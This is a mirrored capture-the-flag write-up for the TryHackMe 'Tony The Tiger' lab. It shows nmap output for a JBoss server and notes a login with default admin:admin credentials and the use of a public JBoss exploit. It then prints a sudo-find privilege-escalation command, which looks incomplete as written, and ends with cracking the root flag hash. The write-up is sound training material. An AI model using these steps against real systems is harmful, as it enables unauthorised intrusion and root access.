mirror of
https://github.com/AbdullahRizwan101/CTF-Writeups
synced 2025-02-26 11:57:12 +00:00
10 KiB
10 KiB
TryHackMe-Tony The Tiger
NMAP
Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-14 20:08 PKT
Nmap scan report for 10.10.127.87
Host is up (0.15s latency).
Not shown: 989 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 d6:97:8c:b9:74:d0:f3:9e:fe:f3:a5:ea:f8:a9:b5:7a (DSA)
| 2048 33:a4:7b:91:38:58:50:30:89:2d:e4:57:bb:07:bb:2f (RSA)
| 256 21:01:8b:37:f5:1e:2b:c5:57:f1:b0:42:b7:32:ab:ea (ECDSA)
|_ 256 f6:36:07:3c:3b:3d:71:30:c4:cd:2a:13:00:b5:25:ae (ED25519)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-generator: Hugo 0.66.0
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Tony's Blog
1090/tcp open java-rmi Java RMI
|_rmi-dumpregistry: ERROR: Script execution failed (use -d to debug)
1091/tcp open java-rmi Java RMI
1098/tcp open java-rmi Java RMI
1099/tcp open java-object Java Object Serialization
| fingerprint-strings:
| NULL:
| java.rmi.MarshalledObject|
| hash[
| locBytest
| objBytesq
| xpCCB
| xpCCB
| #http://thm-java-deserial.home:8083/q
| org.jnp.server.NamingServer_Stub
| java.rmi.server.RemoteStub
| java.rmi.server.RemoteObject
| xpwA
| UnicastRef2
|_ thm-java-deserial.home
4446/tcp open java-object Java Object Serialization
5500/tcp open hotline?
| fingerprint-strings:
| DNSStatusRequestTCP:
| GSSAPI
| NTLM
| CRAM-MD5
| DIGEST-MD5
| thm-java-deserial
| DNSVersionBindReqTCP, GenericLines, NULL:
| CRAM-MD5
| GSSAPI
| NTLM
| DIGEST-MD5
| thm-java-deserial
| GetRequest:
| DIGEST-MD5
| CRAM-MD5
| GSSAPI
| NTLM
| thm-java-deserial
| HTTPOptions:
| DIGEST-MD5
| GSSAPI
| CRAM-MD5
| NTLM
| thm-java-deserial
| Help:
| NTLM
| GSSAPI
| DIGEST-MD5
| CRAM-MD5
| thm-java-deserial
| Kerberos:
| CRAM-MD5
| DIGEST-MD5
| GSSAPI
| NTLM
| thm-java-deserial
| RPCCheck:
| NTLM
| DIGEST-MD5
| CRAM-MD5
| GSSAPI
| thm-java-deserial
| RTSPRequest:
| GSSAPI
| NTLM
| DIGEST-MD5
| CRAM-MD5
| thm-java-deserial
| SSLSessionReq:
| GSSAPI
| DIGEST-MD5
| NTLM
| CRAM-MD5
| thm-java-deserial
| TLSSessionReq:
| GSSAPI
| DIGEST-MD5
| NTLM
| thm-java-deserial
| TerminalServerCookie:
| DIGEST-MD5
| CRAM-MD5
| NTLM
| GSSAPI
|_ thm-java-deserial
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
| ajp-methods:
| Supported methods: GET HEAD POST PUT DELETE TRACE OPTIONS
| Potentially risky methods: PUT DELETE TRACE
|_ See https://nmap.org/nsedoc/scripts/ajp-methods.html
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
| http-methods:
|_ Potentially risky methods: PUT DELETE TRACE
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache-Coyote/1.1
|_http-title: Welcome to JBoss AS
8083/tcp open http JBoss service httpd
|_http-title: Site doesn't have a title (text/html).
PORT 80
We see an image so let's see if there is any stegongraphy involved in this
I tried to run steghide to extract something from the image but failed as there is something wrong with the bytes in the image
Run strings on the image
Now download jboss.zip which is provided in the room
PORT 8080
There is an administrative console and try to login with default credentials which are admin:admin
Now search for the jboss exploit and on the github page you'll find it
Run it like it does in the picture
Looking in jboss directory we'll find a password
Privilege Escalation
We can see that we can run find as sudo so we can run find to execute a command to add jboss in sudoers
jboss@thm-java-deserial:~$ sudo /usr/bin/find . -exec usermod -aG jboss \;
jboss@thm-java-deserial:~$ sudo -l
Matching Defaults entries for jboss on thm-java-deserial:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User jboss may run the following commands on thm-java-deserial:
(ALL) NOPASSWD: /usr/bin/find
(ALL : ALL) ALL
jboss@thm-java-deserial:~$ sudo bash
[sudo] password for jboss:
root@thm-java-deserial:~#
To get the root flag , it is in base64 encoded
Now let's use hashcat it is in md5 raw so we can crack it
